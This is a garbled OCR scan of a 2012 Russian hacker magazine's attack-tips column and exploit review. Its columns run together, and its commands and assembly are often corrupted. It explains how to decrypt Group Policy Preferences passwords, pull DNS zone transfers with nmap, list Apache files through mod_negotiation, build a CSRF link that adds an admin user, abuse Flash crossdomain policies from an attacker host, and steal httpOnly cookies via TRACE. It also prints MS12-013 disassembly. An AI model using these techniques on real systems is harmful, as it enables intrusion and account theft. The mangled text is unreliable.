Google, Ya hoo, B i пg , << Яндекс >> , RamЫer, AltaVista , Aport . Проект
выполнить быстрый поиск по
здесь царит полная анонимность.
системы п е рвыми на рынк е нача
создан при поддержке факуль
новостным сайтам. Не так давно
Распределенная сеть пиров и от
ли предлагать SSL-шифрование
тетов ВМиК и психологии МГУ,
крытый код гарантируют У аСу
(начиная с 2009 года) .
а также Ст з ндфордского универ
<< Яндекс >> инвестировал в
15 000 000 долларов .
Blekko
DuckDuckGo, не сохраняет ин
устойчивость и защищают его от
Осуществляет поиск как по свое
ситета.
попыток цензуры .
ХАКЕР
0~3
04 / 159/ 2012
www.epidemz.net
ВЗЛОМ/ЕАSУНАСК
Ал ексе й «Gr ee nDog >> Тюрин , Digital Security [twitter.com/antyurinl
ВЫТАЩИТЬ ИЗ СИСТЕМЫ ПАРОЛЬ ОТ ЛОКАЛЬНОЙ УЧЕТКИ РЕШЕНИЕ
AO'esse ...) \ \dc2008 .1~b\SYSVOL \dc2008, j.,b\Pollcies\{3 162FЗ40-Q 160· 11 D2·9'1Sf·OOCO<!FB9S4F9} \MACHINE\Prefer·ences\Groups
Как же давно я не писал о такой прекрасной виндавай фиче,
Oossiers
как групповые политики' Тема их обхода стала особенно акту
ij
альной после появления исследования секьюрити-группы
ESEC
[ goo.g l/ zDJFТ ].
Р
Для начала давай уточним задачу. Итак, на гипотетической
2008 Microsoft
TaiHe 1 Ко
т
е
"''
Document XML
26/
{6AC\78бC-0 1 6F· IID
LfJ
8
от локальной учетной записи, которая была создана при помощи Seгver
Nom
SVSVOI. dc200B.I<!!b PoHcies
рабочей ,станции нам нужно вы т ащить и расшифровать параль групповых политик. Если я не ошибаюсь, то начиная с
х
_:_J ....:. Groups. xml
dc2006.1ab !+ ~ NETLOGOO
СЕ
{ЗIB2F340·016D·llDJ GroupPolм:y МACHINE
-
Windows
Мlcrosoft
ввела специальное расширение для ло
.:1
Preferences
кальных политик под названием Group Policy Preferences [GPP]. В
Windows Vista
и
Windows 7 локальные
политики поддержива
ются нативно, а вот для ХР потребуется поставить специальное
Файл с групповой nолити к ой для соз д ания п о л ь зователя
обновление. Так вот, одной из добавленных функций была воз можность создавать локальные учетные записи для группы до
•
Group Роtк:у r1anagement Editor
•
•
менных хостов. Функция, безусловно, полезная, и, как уверяют люди из
ESEC,
часто используемая администраторами. Вот такие
учетки мы и научимся доставать.
Теперь давай посмотрим, где же эти учетки создаются. Д ля
этого мы должны найти на контроллере домена раздел
<<Group Policy Management>> [gpmc.msc]. В нем создаем новую по литику, а затем в <<Local Users and Groups>> ве т ки <<Computer Configuration>>- нового пользователя. В процессе создания мы указываем параль и задаем другие стандартные настройки
В
PreШ~s
Action
\~lindo<o\'S~ttln9s
8 @] Control P~nel Sc:t"tn9s ';~,! O.ta Sou'cos ~DeVICeS
Gf Fo&derOptions
Тhereare
no
j8t11t - НF
~ Local Users and Groups
Loca!Group
аккаунта. После этого при обновлении политик на доменных хостах наш пользователь будет успешно создан.
Создание пользователя при помощи г р упповы х nолитик
ХАКЕР
www.epidemz.net
03 /158/2012
EASY НА СК
Дальш е ребята и з
ESEC
п осмотрели, как все nроисходит изну
subAuthority= " " userName="MylocalUser" /> </ User> </Groups >
три, и как данные о груnnовых политиках передаются с контрол
лера на хосты. Итог оказался вполне предсказуемым. При обновлении политик дом енный хает залезал на шару
SYSVO L-д o м e н a и скачивал ХМL-файл с политикой. В нем как раз Здесь необходимо уточ нит ь еще несколько моментов. Во
и н аходил и сь имя пользователя и па роль. В общем, все стандар
первых, данный файл доступен всем доменным пользователям,
тно . Прим ер тако г о файла:
даже непривилегированным. В о -вт орых, параль расшифровать
очень просто, ведь хотя и и спользуется
c?xml version= "1.8" encoding= "utf-8" ?> cGroup s clsid= "{3125E937-EB16-4b4c-9934-544FC6D24D26} " >
AES 256,
но вот ключ
nрошит в са м ой ОС , то есть известен априори. На нашем диске ты сможешь найти питонавекий скрипт для расшифровки таких
па ролей.
<User clsid= "{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name= "MyLocalUser" image="8" changed= "2811-12 - 26 18:21 : 37"
За остальны ми подробностями советую обратиться к ориги
нально м у исследованию
ESEC.
Хотя оно и не является исследова
нием в своем пер ваначальнам смысле !это скорее доведение до хакере к их масс официаль н о описанной фичи), Microsoft в описании
uid= " {A5EЗF388-299C-41D2-B937-DD5Eб38696FF}" >
GP <Properti es action= "C" fullName =" " description= ""
четко nредупреждает, что данные в
GPP
передаются в незащи
щенном в ид е.
И что использовать функционал требуется с большой осто
cpassword = "j1Uyj3VxBTY9LtLZil2uAuZkFQA / 4latт76ZwgdHdhw"
рожностью, особенно при создании привилегированных учеток
changelogon= "8" noChange= "8" neverExpires ="8" acctDisaЫed= "8"
в ОС.
ПОЛУЧИТЬ СПИСОК ХОСТОВ ИЛИ
DNS ZONE TRANSFER
Р ЕШЕНИЕ При провед ении любогоИБ-исследования в первую очередь нам требуе т ся ответи ть на во пр ос «а кого же атаковать>>? Это важно, так как практически любая атака чаще всего проводится nротив какой-т о ор г ан и зации, у которой может быт ь очень много ресурсов. А нам необходимо определить с реди них самое с лабо е зве н о или наиболее критичный ресурс. DN S-имя хос та может д а т ь прилич ный профит в этом с м ысле, так как зачастую оно отражает свой функциона л ьный с мы сл. Н ап рим ер, в корпоративных сетях вполне могут при сутство вать такие имена как
«b uhg al>>
или
«bank>>,
до ко
тор ых тебе, конечно же, захо чет ся д обраться. Как при мер, для веба
можно в зять поиск <<с крытых>> доменов вроде
admin.example.com .
Одним из простейших методов опре д еления имен хостов
является об р ат ный DNS- зan p oc lгeveгsel, когда мы запрашиваем у DNS- cepвe pa именахостов на основании их IР -а дре сов. Однако для карпаративак этот метод ш умноват, так как необходимо за п ра шивать имена для всех хос тов по очере ди , а для веба он не совсем оправдан, -д омены могут нах о дить с я не на смежных IР-адресах. Н о если нам п овезет, и DN S - cepвep не совсем корректно настро
ен, т о мы сможем получить всю необходимую информацию разом. Д а-да, я говорю про
DN S Zone
докумен т ированная функция
Tг ansfeг. Для т ех, кто не в курсе, эта
DNS
nр е дна значена для того, ч т обы
д е л иться св оими заnисями о зон е. П ри корректной настройк е
Zone transfer для
одного из корневых серверов домена . агра
Zone
Тг апsfег должен быть разрешен с первичного DN S - cepвepa т олько
дить
на вторичный , но об этом часто забывают.
все свои заnис и. Жаль, конечно, что в этом сп и ске отсутствуют
zon e tгa nsfeг.
Е сли точ н ее, то
65
из
312 TLD
n озволяют получить
порту DNS -cepвepa по nротоколу ТСР и создать AXFR-зanpoc.
.com 250 заарх и вированных мегабайт можно получить по ссылке goo.gl /uVS1X . Но
Практиче ски это можно вы п олнить, используя только функционал
давай п опробуем собрать такой списо к сами:
ст андартной виндавай команды
1. 2. 3.
Используем стандартную команду
4.
Д елаем за прос на доменаграи получаем обслуживающие е го
Итак , чтобы получить зо н у, нам требуется подключи ть ся к
буд ет исnользование
nslookup,
53
но nрактичней вс его
Nmap.
nmap --s cript dn s-zo ne-tran sfer. nse \ - -scr ipt-args dn s-zone-t ra nsf er.domain= <domain >
и . гu, н о все равно nриятно. П олуче нны й им сnисок на
nslookup.
Выбира ем DNS- cep вep от Гугл а: sегvе г 8.8.8.8. Выставляем тип искомых записей :
Set type=NS.
DNS-c epвep ы: агра.
5. Н о все это классика. П риведу в пример небольшее исследова
ни е, проведенн ое неб ез ы звест ным экспертом НО Мооге . Он nро
ска нир овал ос н овные D N S-cepвepы о т их TLD ltop-level-domain: .net, .огg , .ххх и так далее) и вывел, что многие из них разрешают право-
Подключаемсяк одному из DNS-cepвepoв в списке: sегvег b.гoot se г veгs.net.
6. Трансф е рим зону для у казанного домена: ls -d агра. Конечно, агра-это так, для забавы, много интересной инфор мации мы не получим. Н о общая идея, думаю, nонятна.
ХАКЕР ОЗ /158/2012
www.epidemz.net
ВЗЛОМ 1EASY НАСК
ПРОСМОТРЕТЬ ЛИСТИНГ ФАЙЛОВ В АРАСНЕ
d•Ы!r.:J -лк:r
РЕШЕНИЕ Для начала давай представим себе ситуацию, что мы исследуем
foo.htm.eп и
какой-то ёайт. На этом сайте крутится
который совпадает с пришедшим от клиента заголовком
Apache.
Первым делом же
лательно понять, какой же движок используется нашим ресурсом. Если точно определить
CMS,
то, используя общеизвестные
foo.htm.de, то по за просу /foo.htm будет отдан тот, <<Accept-
Language>>. Но еще более интересным является поведение модуля с ис
уяз вимости, произвести взлом будет очень просто. Но если это
пользованием параметра
что-тонестандартное и без доступных исходников, то могут воз
тестовом запросе
никнуть проблемы. Хотя многое зависит от самого приложения.
тории по маске
В любом случае я не думаю , что нужно сразу же погружаться
вариант>>.
в дебри взлома, стоит еще немного пособирать информацию. Что
Mu ltiViews. Е сли он включен, то при <<foo>> Apache проводит поиск в данной дирек <<foo*>>, а потом отдает пользователю <<наилучший
Включение
Mu ltiViews производится за счет записи строки MutiV iews в секции виртуальных хостов или конкретных
мь1 ищем? Любые полезные нам данные. Например, исходник и,
Optioпs
файлы бэкапов, конфиги . Как искать?
директорий. Хорошо, но что же все это нам дает? Тебе ответит И Б
Первым делом желательно и обязательно проверить возмож
исследователь Стефа но Ди Паола (Stefaпo Di Paola, goo.gl/ly8HK ]:
ность листинга директорий на сервере, и, если она присутствует,
частичный листинг файлов. Как? Все очень просто. В
мь1 сразу поймем, что можем получить. Например , на одном из
Стефан о помучал данный функционал и выявил, что при уста
2007
году
сайтов, с которыми я когда - то имел дело, как раз и присутствовал
новке некорректного заголовка
такой листинг, а в самом приложении, как оказалось, находилось
последний с помощью логики mod_пegatiatioп вернет нам список
всего пара рhр-скриптов, которые просто п о дгр ужали осталь -
абсолютно всех файлов с запрашиваемым именем, так как не
ной функционал из iпс-файлов. Так как файлы типа iпс
сможет выбрать <<лучший вариант>>. Смотри, если мь1 запраши
Apache
не считает какими-то уж особенными и позволяет их абсол ютно
ваем файл
спокойно скачиват ь , то я очень быстро и легко по лучил почти
вернется << наилучшиЙ >> вариант:
foo
<< Accept >>
при запросе к серверу
без расширения, но с заголовком
<<Accept>>,
то нам
все исходник и сайта. Но так везет не всегда . А что делать, если листинга нет? Классика пент еста - это брутфорс по слова рю. Не
Запрос
когда я писал об этом и упоминал ту л зу DiгBusteг. Но брут форс
GET /foo Н ТТ Р/ 1.1 Accept: */*
штука грубая , хотя и вполне рабочая . Но давай ближе к теме . Всем известный веб-сервер
Apache
со держит интересный модуль под названием mod_пegatiatioп.
Ответ
Данное ра с ширение чаще всего включено по дефолту. Если
Н ТТ Р/ 1 . 1 21313 ОК Server: Apache/2 . 13 . 55 Content- Location : foo.php Vary: negotiate,accept TCN: choice
говорить по-простому, т о отвечает оно за <<у мную отдачу контен
та». То есть, если пользователь запрашивает какой-то ресурс
!страницу], то ему будет отдаваться страница, которая подходит больше всего . Н апример, если на сервере хранится пара файлов
Частичный листинг файлов . Бэкаn найден- качаем
ХАКЕР
046
www.epidemz.net
04/159/2012
EASY НАСК
А если мы запрашиваем то же самое, но снекорректным за
когда файлы бэкапов хранятся рядом, случаются очень часто,
головком <<Ассер!», то нам вернет ся практически полноценный
многие программы автоматом создают их при редактировании
листинг:
основных файлов. Важным ограничением способа является то , что в вывод веб-сервера попадают только те файлы, чье рас
За прос
ширение присутствует в конфиге апача [AddType] . То ест ь файл
GE T /foo НТ ТР/ 1 . 1 Acce pt: ххх/ЫаЫа
с расширением .php- в листинг, к сожалению, не попадет. Думаю, з десь важно подчеркнуть, что описанное выше по ведение Apache- нормально. То есть разработчики не собираются
От ве т
менять его. И как уже было сказано выше, это свойственно всем
НТТР/1. 1
основ ным веткам Apache. Хотя данная фича в любом случае не
406 Not AcceptaЬle Server: Apache/2.0 . 55 Alternat es : { "foo .bak" 1 { t ype appl i cation/x-trash} { l ength 3}}, {"foo.php" 1 {type appl ication/x-httpd - php} {length 3}}
избавляет нас от необходимости перебора, но мы вполне можем
воспользоваться уже имеющимися данными [именами страниц] и не перебирать вслепую.
В Metasploit присутствует соответствующий модуль [auxiliaгy/ scaппeг/http/mod_пegotiatioп_bгute], проводящий брутфорс с уче том этой фичи, да и сканер от Acuпetix имеет аналогичный функ
Vary: negoti ate,accept TCN: l ist
ционал. В качестве простейшего примера- чекер mod_negotiation с использованием пmар:
Что это может дать? Конечно, все сильно зависит от ситуации, но в основном это попытка добраться до бэкапов. Кстати , ситуа ции,
пmар
--script=http-apache-negotiation
-р80
-sV
ВЫПОЛНИТЬ ДЕЙСТВИЯ.,ОТ ИМЕНИ ПОЛЬЗОВАТЕЛЯ В КАКОИ-ЛИБО
РЕШЕНИЕ
CMS дефопту на всех компьютерах [привет яблочникам
Для начала давай расширим задачу. Есть пользователь, залоги
:1. А
во-вторых,
предоставляет много возможностей по взаимодействию с сетью.
нившийся в какую-нибудь веб-систему [например в админку]. Есть
В самом простом виде атака с использованием flash будет иметь
хакеры, которые хотят получить привилегированный доступ в эту
следующий вид. Есть evil .com- хает атакующего со специальной
сис тему. Дл я приличия добавим возможность подсунуть этому
флэш кой, и есть victim.com с нужными нам данными. Когда юзер
пользователю произвольную ссылку или проснифать его незашиф
зайдет к нам на evil.com, флэш автоматически запустится и вы
рованный трафик [хотя сама админка будет находиться за https'oмl.
полнит загрузку страницы с victim.com, причем используя родные
Самый простой и действенный способ- это, наверное,
CSRF:
кукисы пользователя! Д алее все стандартно,- из страницы доста ем токе н , подставляем его в запрос и выполняем.
Все круто? Как бы ни так. Здесь нам мешают same oгigiп po licies . Ведь evil.com- один домен, victim.com- другой, а следова
https://victim.com/admin . php?adduser= 1&user=hacker& password=hacker
тельно взаимодействие по флэшу запрещено. Однако существует Если мы заставим браузер перейти по этой ссылке, то в системе
и вполне легальный способ, разрешающий такое <<общение>>,- это
будет создан новый пользователь. Но это возможно только в том
файл
случае, если веб-приложение уязвимо к таким атакам . К счастью,
шу. Он должен быть расположен в самом корне сервера victim.com.
crossdomain.xml. В нем указывае тся, что можно делать флэ
во все большее количество ПО внедряются всяческие механизмы
Таким образом, когда флэш-ролик пытается прочитать страничку
защиты от CSRF. Самый распространенный- токены. К каждому за
с victim.com, флэш сначала читает victim.com/cгoss domaiп.xml и на
просу на странице добавляется токен, который действителен толь
основе него уже делает вывод, разрешено ли подключаться к этой
ко для одного запроса. Таким образом мы получаем ссылку вида
странице. В настоящий момент флэш поддерживает целый набор о граничений. Я не буду описывать все, коснусь лишь основных,
общая спецификация от adobe находится по адресу goo.gi/A02R1.
https : //v i ct i m.com/a dmin . php ?a dd user=1&u ser= hacker& password= hacker&toke n=l on g_ran dom_bu kva _ ci fra
Вот при мер :
Да, CSR F уже не про катит. Что дальше? Конечно же, XSS. С по мощью этого вида атак мы сможем загрузить нужную страницу,
вынуть токе н и создать ядовитый запрос [плюс много еще всякого ст рашного ] . Н о у XSS есть пара проблемных моментов. Хотя они и являются самым распространенным видом багов на сегодняшний
день, но в основном это касается гeflected XSS [то есть когда код
попадает из запроса], ведь stoгed XSS [когда мы можем добавить контент в страницу] бывает не часто. Но во многие браузеры натив но и л и с помощью плагинов встроена хорошая защита от гeflected
c?xm l version= "1.0" ?> c!DOC TYPE cross-domain-pol i cy SYSTEM "http://www.adobe . com/xml / dtds/cross-domain-policy.dtd" > ccross-domain-policy> csite-control permitted-cross-domain-policies= "master-only" /> callow-access-from domain= "* .victim.com" sec ure= "false" /> callow-access- f rom domain= "www.microsoft.com" /> c/cross-domain-pol i cy>
XSS. Классический пример -IE. И здесь без извращений и/или Поясню некоторые моменты. Главный пункт здесь, конечно
со циальной инженерии защиту не обойти. Давай посмотрим, можем ли мы сделать что-то еще? Ответ
flash. У него есть несколько плюсов. Во-первых, сейчас он стоит по
Х АКЕР
же, это allow-access-fгom, указываю щий на то, с каких серверов
доступ разрешен. Здесь э то любые поддомены victim.com и один-
04/159/ 2012
047
www.epidemz.net
ВЗЛОМ 1EASY НАСК
Microsoft. Master-only указывает на то, что исnользуется только crossdomain.xml, лежащий в корне, хотя есть и другие варианты,
«si te-control>> находится не в положении «master-only»l, а до
но об этом дальше. Вот теперь у нас появляется возможность
ступ флэш - ролику будет разрешен только в данную директорию
для маневров. Наnример, с помощью
DNS
или
можем представиться одним иэ поддоменов
NBNS-spoofing victim.com и по
мы
лучить, таким образом, возможность использовать флэш на
быть разрешение от корневого файла [значение директивы
или ее поддиректории. Таким образом, у нас есть небольшая возможность либо найти альтернативные файлы на
полную. Кроме того, мы можем искать уязвимости уже во всех
этих доменах и через них атаковать пользователей
victim.com. Далее нам интересен атрибут secure [по-дефолту «true>>l,
victim.com,
либо залить xml'кy. Кстати, наиболее простым и частым баrом здесь является неправильное использование директивы
<allow-access-from
«>. В данном случае мы можем обращаться к жертве
domain=>>*
указывающий на то, нужно ли флэш у обращаться к данному хо
с любого из хостов, а также производить nочти любые действия
сту только с https. То есть в данном случае [falsel мы можем про
от чужого имени. Много ли таких сайтов? Прилично. П одроб
вести на
ности смотри в научной работе про анализ
victim.com
атаку
Man-in-the-middle,
а затем внедрить
нашу флэш к у в НТТР-ответ от сервера. П олучается, флзшке
Alexa
Тор
50 000
от
наших коллег из Сан-Диего [goo.gl/riCLll . Еще хотелось бы вспомнить про такую альтернативу флзшу
буде т разрешено «обща ться >> и с https'oм этого домена. Также хочу добавить еще несколько важных замечаний.
как
Silverlight
от
Mi croso ft.
У них nочти аналогичная система
Во-первых, когда флэш-ролик отправляет куда-либо запрос,
кроссдоменного взаимодействия, только с несколькими отли
то в качестве его родного домена определяется то место, где
чиями. Файл политик называется
флзшу можно указать альтернативный файл политик, назы
clientaccesspolicy.xml, однако Silverlight его не находит, то ищется crossdomain.xml. Сам же clientaccesspolicy.xml не поддерживает исnользование символа множества 1«*>>1 для оnисания доменов и не различает http- и https-npoтoкoлы. Так что через него также можно вы
вающийся по-другому и лежащий на
полнять действия от имени пользователя, если только повезет
он хостится фактически, а не то, где он вставлен в страницу. Во-вторых, при отсутствии
crossdomain.xml
флэшунасамом
деле не « запрещается все», как считают многие. В таком случае
файлы
crossdomain.xm l
victim.com.
В-тр етьих,
могут лежать и в паnках . Но должно
если
с хml'ками.
ОБОЙТИ ФЛАГ COOKIES HTTPONLY РЕШЕНИЕ XSS- это одна из самых распространенных ныне уязвимастей
SESSION1D::tmAhnpOnJyCoolde
веб-приложений. К тому же она очень опасна, потому что по сути мы можем выполнять почти любые действия от имени пользова теля. Но если все же вернуться к классике, то итогом
XSS
ок
долж-
на быть украденная сессия пользователя. Так как чаще всего авторизация юз ера происходит именно по кукисам, то целью атаки
с использованием
XSS
является их угон. Чаще всего это можно
сделать с помощью данных из переменной
Но все
document.cookie.
несколько затруднилось, когда появился такой чудо-браузер, как Разработчики внедрили в него специальный флаг
IE6.
httpDnly.
НТТР/!.!
javascript.
Ага, идея хорошая.
Вот только с реализацией не так все здорово, ведь по идее флаг
t eb : 01:
::о: ~9:
JS GKT
Арасье·::. : .н
1FreeBSD1 nood ss 1 ·:.::.11 OpenSSL/0.9.7e-p l Con't:'!lnt-Lenqt h : н:е
Connect1on: clo:~e Content-Type: text,'htnal: Т"
Основная его задача заключается в том, чтобы указать браузеру, что данную куку нельзя доставать из
P..equ~st
100 8fld
Dllt!': T!IU, 09 S~rver:
.!.
TXL
'IBL:
Р И Р/.5.::.1:
·ot t.h
Suhcннn- Plltch nюd
t cq1d':.з.s
-
cho~~rset•iso-8859-1
"·
Reqцest </hJ>
<h!>Blld
<P> Yo11r brovser se11t 11. re\(\\e s t. tiiAt. t.his se rv er co1tl.d 11ot tшderstмld S i %e ot "' reqt 1est lteAder f t e..l.d exceeds server ~inoit .<t' '>
.<bt
1>
должны выставлять сами разработчики ПО , которые до сих пор
этим nренебрегают. Теnерь давай nредnоложим, что его обойти? Бородатый метод-
<<httpOnly>> установлен. Как cross-site tracing. Придуман он
аж в с
2003 году и основан на том, что многие веб-серверы наряду GET- и РОSТ-методами поддерживают еще и ТRАСЕ-метод. Дан
ный метод крайне пр ост: веб-сервер возвращает полностью весь запрос, который был отправлен клиентом. То есть получается так: мы должны внедрить через
XSS
такой код, который должен будет
отправить любой запрос на тот же сервер с методом
TRACE,
а затем
прочитать пришедший ответ. В этом ответе кроме искомых кукисов
могут содержаться и другие интересные данные
[basic или ntlm-
Apache 2.2. Большой D:ч•rj
· .. .:- "!
TRACE /
>nc,~t НТТР/1.1
заголовок лриводит к ошибке с раскрытием кукисов
l ..
u 80
~: ~~ ~ ~ : Sc;; 1orr 1 D~u4enZ<o:; 4 i4crш" y,oCook,o 1
НТТР/ 1.1
Doil.te:
200 ОМ f1111. f·J9 Feh 2012 7.U:!.o9:42 GMI
s.,....,.,,.: Ap.•clte/2.2.14 L/('1 . 9.?.-·pt y,. ,..,~fer-l:llcodin!l:
Contcnt-Typc:
'"
<F•·eoВSD>
РНР/!..2.12
11itl1
SLoloo:;i~t-P.otclo oшtl_ic!lid/2.3.!>
l'lotl_~~l/2.2.14
Оре
~;)щrLI<ed
nc~~.~ge/lottp
IRACF / IIITP/t .1 Ho~t:
1
. .
_ _ .<
Cook ie : Se ~ ~ ion 1 D ·o 4enz..,~ 4 i4enn,,y.oCook,,
аутентификацияl. Важно упомянуть, что многие веб-серверы до сих пор поддерживают данный метод.
Кроме всего этого существуют также и несколько зависимых
ТRАСЕ- з алрос . Веб -с ервер во з вращает все , что ему послали. Дажекуки
от сервера возможностей. Новым и крайне забавным примерам является
клиентом запрос. Чтобы создать такой запрос, требуется всего
сии
Apache. Если точнее, то вся его ветка 2.2 вплоть до вер 2.2.22. Логика здесь такая же, как и в случае с TRACE, только
лишь отправить легитимный пакет с очень большим заголовком.
кукивозвращаются в ответе об ошибке веб-сервера. Норман
В РоС' е автора используется простейшая реализация этого ба га:
Хипперт [Norman Hippert, goo.gl/ndGpvl обнаружил, что при ошибке
с помощью
400 [НТТР 400 Bad Requestl возвращается весь отправленный
кукисов и отправляет запрос на сервер.
javascript
он выставляет большое количество длинных
ХАКЕР
048
www.epidemz.net
04/159/2012
(game}land ЖЕI\ЕЗОi 10 дюймов и ЗG за 400 баксов
~~
ПОДПИШИСЬ! shop.glc.ru Редакционная подписка без посредников это
гарантия
получения
важного
для
-
Вас
журнала и экономия до 40 о/о от розничной цены в киоске
6 номеров - 111 О руб. 13 номеров - 1999 руб.
6 н омеро в - 111 О руб. 13 н оме ров - 1999 руб.
8-800-200-3-999 +7 (495) 663-82-77 (бесплатно)
ФОТО
6 13
н оме ров номеров
- 564 руб. - 1105 руб.
6 н омеро в - 111 О руб. 13 но меро в - 1999 руб.
6 13
н омеровномеров
-
810 руб. 1499 руб.
6 номеров - 111 О руб. 13 номеров - 1999 руб.
XYIIИГIJH
6 13
номеров номеров
-
630 руб. 1140 руб.
6 13
н омеров ном еров
-
895 руб . 1699 руб .
6 н о меров - 1194 руб . 13 н о меров- 2149 руб .
6 13
номеров
6 13
номеров-
н омеро в
-
894 руб. 1699 руб.
lффi!. !JU.ЦЩ:IЦ!iЦЩШ -··.
шr;~а.ш.rr,м ~ КРАСНАЯ
YrP03A ASTotLUA
ТАИНОЕ ОРУЖИЕ
6 13
н омеров номеров
- 690 руб . - 1249 руб .
6 13
номеров номеров
-
775 руб . 1399 руб.
6 13
номеров номеров
-
www.epidemz.net
950 руб . 1699 руб.
номеров
-
810 руб . 1499 руб.
Павел Александрович [ivinside.Ыogspot.com[
ВЗЛОМ/ОБЗОРЭКСПЛОИТОВ
Дмитри й Михайлович
[115612, дер. Красная звездочка, д . 1[
эксплоитов И вновь мы с тобой встречаем с я , чтобы разобраться во внутрен не м устройс тв е последних
интереснейших образцов из области эксплоитостроения. Крепче хватайся за жу рнал и внемли же слогу бинарному ...
ХАКЕР
DSD
www.epidemz.net
04/159/2012
Обзор экс п ло ит ов
MS12-013: Уязвимость в библиотеке времени
1
выполнения С (msvcгt.dll)
. text:6F FBEA20 pus h еЬх ; mov е Ьх , [esi] i n the entry .text:6FFBEA21 call - calloc_crt
кой msvcгt.dll размера буфера в памяти существует уязвимость,
. text : 6FFBEA26 . text: 6FFBEA27 .text:6FFBEA28 .text:6FFBEA2A .text:6FFBEA2C . text:6FFBEA2E .text:6FFBEA31 . text:6FFBEA34 .text:6FFBEA37
которая делает возможным удаленное выполнение кода и по
. text:бFFBEAЗD
зволяет копировать данные в память, не выделенную должным
.text:бFFBEAЗF
CVSSV2
9.3
11111 11 1111 11 11 111 IAV:N/AC:M/AU:N/C:C/1:(/A:C]
[]Il]i Msvcгt.dll- многопоточная библиотека динамической ком
поновки IDLL] времени выполнения С, которая используется компонентами системного уровня. В способе расчета библиоте
рор
есх
рор
есх
Ыосk
mov [edi], еах test еах, еах jz short loc_6FFBEA1A push [ebp+pulResult] ; size_t mov еах, [ebp+arg_8] push [ebp+arg_4] ; void * mov dword ptr [еах], 1 push dword ptr [edi] ; void * call _memcpy
образом. Эта уязвимость делает возможным удаленное выпол нение кода при запуске пользователем специально созданных
файлов мультимедиа. Е с ли пользователь вошел в систему с права ми администратора, то злоумышленник, которому уда
лось воспользоваться уязвимостью, может установить полный контроль над системой, после чего он сможет устанавливать программы, просматривать, изменять и уничтожать данные или
создавать новые учетные записиснеограниченными права ми.
Риск для пользователей, учетные записи которых имеют огра
.text:6FFBEA44 mov еах, [esi] .text:6FFBEA46 push esi ; pulResult .text:6FFBEA47 add еах, еах ; ! ! ! ! .text:6FFBEA49 push 2 ; int . text:6FFBEA4B push еах ; int . text:6FFBEA4C mov [e si], еах . text : 6FFBEA4E call ?SizeTMult@@YAJ I I PAI@Z ; SizeTMult(uint, uint,uint *)
ниченные права, меньше, чем для пользователей, работающих с .text:бFFBEASЗ add esp, 18h .text:6FFBEA56 test еах, еах .text:6FFBEAS8 jge short loc_6FFBEA78
правами администратора.
l j:JЦ!•'ii Патч от MS затрагивает функцию __ check_float _ stгiпgl]. В связи с тем, что библиотека времени выполнения С поставляется в виде исходниковсовместно с MS Visual Studio, посмотреть на
вышеупомянутую функцию можно в VC/CRT/sг c/iпput.c . Логика работы у функции __ check_float_stгiпgll следующая. С самого начала у библиотеки времени выполнения имеется
Обрати внимание на аргументы функций __ calloc_cгtll и SizeTMultll . В момент вызова _ _ ca l loc_cгtll мы имеем сле дующий набор аргументо в: __ calloc _ cгtiSize, 2]. Однако в момент, когда для записи переменной размера вызывается функция SizeTMult, ее набор аргументов выглядит так:
буфе р статического размера I_TCHAR floatstring[_CVTBUFSIZE
+ 1] ; 1. Как только требуется буфер большего размера, проис
SizeTMult(Size*2, 2, &pResult)
хо дит перераспределение памяти. Порядок подобного пере распре деления таков: выделяется удвоенный размер буфера и
П осему, несмотря на реальный размер выделенной памяти
удваивается значение переменной, содержащей этот размер.
под буфер в Size*2, в переменную размера сохра няется значение
При первой итерации увеличения используется вызов функции
Size * 2*2. В связи с этим переполнение кучи происходить будет,
callocl], далее используется гecallo ci]. Основной момент, в связи с которым имеет место быть MS12-013 , состоит в nопытке записи
но- за пределами рассматриваемой функции.
нового размера буфера.
SizeTMultll. В этот раз имеем SizeTMult(Size, 2, &pRes ult ]. В итоге MS пришлось избавиться от инструкции «add еах, еах»:
Ниже приведен дизасм-листинг старой версии msvcгt.dll:
.text:б F FB EAlE loc_6F FBEA1E : ; CODE XREF: sub_6FFBE9F3+25 ] j . text:6 FFBEA1E push 2
155 ••• 156 • lnt 157 -
158 ·
· · ·
•
_те~~ - ·
.Т >АР·
lnt•>
Ci'Wck .f tl'ltrt ts tnou"'" SP4tl ii'IИrt ont~~~ort ~harocttr tr tht gl\len
159 •
166 161 1&2 163 16<1
l
~-~heck.f!cat .s t~t,...cslzt.t.sl:t.t
Puroost
Ыос:•
J:ttuгn
-
FAlS(
Jfncttlwt'laiiiiCDtt-.ort~\,1
:f .,orf•t~~~or ynvtdedo"dthertoollocottonfolltd.
·
1&'5 ···············································································1
166 167 .. totlc lnt. •• cl\tck. fl ot~t.s tr ! no C •.Itt' . t N lo &t StrUs.ct , 16!1 ~''' t • pnf'\ oetStr Sz . !69 . TCt!RR •• Df'l o11tStr ,
~~~
i~~goa;П ~~~F}~~~~t,.rtaoJ
172 ( 173 17< 17'. 176 171
vold
•tlrч!Po l n t и ;
CPТJ.JRRНIHB_D I SRВL E_PUSH C ''fl\1 ,
ttr"" !Yt _RSSERTE CnFi oat StrU itd<• C•onFI ()& t St rSt J J : lf CnFi o&tSt r Ustd•• C•pnFlo&tStr St J I 1 lf C( • pF lo<!!tStr J• • fl oats tr l no l
178 17'>
(
"" "'
lf { ( {• pF lo at S\r ) • ( _TCitAR· >.c:all oc _c: r H {• Dnf' l oa t StrSt ) ,
101
(
183
)
.text:6FF BF935 push [ebp+pulResult] ; size_t .text:6FFBF938 mov еах, [ebp+arg_8] . text:6FFBF93B push [ ebp+arg_4] ; void * . text : 6FFBF93 E mov dword ptr [еах] , 1 .text:6FFBF944 push dword ptr [esi] ; void * . text:6FFBF946 call _memcpy .text:6FFBF94B push edi ; pulResult .text:6FF BF94C push 2 ; int . text:6FFBF94E push dword ptr [edi] ; int . text:6FFBF950 call ?SizeTMult@@YAJ I I PAI @Z ; SizeTMult( uint,uint,uint *) .text: 6FFBF955 add esp, 18h РОС для MS12-01 3:
•s l t~f (_TCНRR J ) J ••
rl!tLrn FRLS[.
~=~~~~iiИ ~:~~t~~ ~1?~::~tr l no . С • onFI ()& t Str StJ •slz~H - TCHRRI J;
18< 1ВS
186 107
#include <windows . h> #include <stdio . h>
( • pnFl oo t Str Sz J· • .
) о1и
IОЗ
"'
(
199 191
{• onF io &tStrS z J,
"'
• Sit~f (_ TC HRR J J J •• '
rltLrn FRLS[ .
103
)
19< 111'5 1_ 197 198
C•DF IOIItSt r J• C.TCHRR • I CtP.IoPol nttr J; ( •onfl oo t St rS z l •• :
199 21111 1
А это пропатченная версия. Вновь посмотрим на аргументы
)
